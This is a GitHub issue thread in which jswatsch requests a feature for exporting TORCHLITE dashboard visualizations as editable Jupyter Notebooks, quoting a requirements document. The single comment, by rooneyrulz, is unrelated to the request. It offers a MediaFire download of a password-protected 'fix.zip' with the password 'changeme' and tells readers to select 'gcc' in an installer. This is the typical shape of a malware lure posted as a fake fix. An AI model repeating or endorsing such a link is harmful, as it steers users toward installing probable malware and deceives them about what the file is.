### ISSUE TITLE
Export Widget Notebook

### ISSUE THREAD

**Issue by jswatsch** [htrc/torchlite-backend#117]
### Functionality/Design Description
Users can export a Jupyter Notebook of each visualization

### UI Elements/Design Focus
Export as Jupyter Notebook button

### Additional Comments/thoughts
Potentially also "download" as Jupyter Notebook? Or they could do that from within the Jupyter Notebook?

From [John Walsh's Requirements Document](https://docs.google.com/document/d/1PfBX4rnLnYMX-7h48C3Qr0_iQM_PAxqn5hOJryPFn80/edit#heading=h.gojf48me3vbt):

### Customizing Dashboard Widget Visualization

**Notebook name**: Custom Viz

**Use case**: A user wants to use a visualization from the TORCHLITE dashboard in their own work, but needs to customize it with their own colors, labels, etc.

 **Description**: This is simply a notebook version of an arbitrary dashboard widget.This notebook has the following general functionality:

- Gather workset EF data, pre-process it into the necessary form for visualization.

- Notebook contains visualization code that generated the TORCHLITE dashboard viz. If this code happens in a less-user-friendly programming language, it should be ported to Python or another beginner language.

- Viz code is editable and configurable, with optional documentation for which parts of the code to revise.

- As with the dashboard widget, enables save of viz as PNG (bitmap) and PDF (vector) formats.

**Relevant Extracted Features:** JSON Object Keys | Visualization-dependent

**Comment by rooneyrulz** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."
